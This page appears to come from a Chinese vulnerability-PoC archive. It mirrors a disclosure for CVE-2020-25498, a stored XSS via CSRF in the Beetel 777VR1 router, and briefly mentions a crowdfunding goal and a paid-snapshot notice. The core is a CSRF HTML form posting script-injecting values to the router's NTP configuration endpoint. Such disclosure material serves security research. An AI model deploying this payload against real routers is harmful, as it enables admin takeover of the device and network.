目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2020-25498 PoC — Beetel router 777VR1 跨站脚本漏洞

来源
关联漏洞
标题: Beetel router 777VR1 跨站脚本漏洞 (CVE-2020-25498)
Description:Beetel 777VR1是Beetel公司的一款路由器。 Beetel router 777VR1 存在跨站脚本漏洞,该漏洞源于系统时间中的NTP服务器名和URL过滤器中的“关键字”。
Description
Stored XSS via CSRF in Beetel 777VR1 Router 
介绍
# CVE-2020-25498: Stored XSS via CSRF in Beetel 777VR1 Router

## **[Vulnerability Description]()**

It has been identified that the vulnerable endpoint doesn't have server side input validation and lacks client side filtering for any malicious script injection. An attacker can use this vulnerability to inject malicious script in the endpoint and the script is activated every time a user opens the vulnerable endpoint. Attacker can send a malicious URL with POST request payload to execute XSS in admin module via CSRF to take over the device and finally, to take over the network.

**Researcher:** Sayli Ambure (https://twitter.com/sayli_ambure)  

**MITRE CVE link:** https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

## **[Proof-of-Concept Exploit:]()**

**CSRF HTML Code:**
```
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

### **[1. NTP Server Name in System Time configuration module]()**

**Parameter: Server name**

### **[Proof of Concept Video:]()**

<a href="http://www.youtube.com/watch?feature=player_embedded&v=qeVHvmS5wtI
" target="_blank"><img src="http://img.youtube.com/vi/qeVHvmS5wtI/0.jpg" 
 width="500" height="300" border="10" /></a>
 
 ### **[2. URL Filter endpoint in Firewall module]()**
 
 **Parameter: Keyword**
 
 ### **[Proof of Concept video:]()**
 
<a href="http://www.youtube.com/watch?feature=player_embedded&v=u_6yBIMF74A
" target="_blank"><img src="http://img.youtube.com/vi/u_6yBIMF74A/0.jpg" 
 width="500" height="300" border="10" /></a>
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →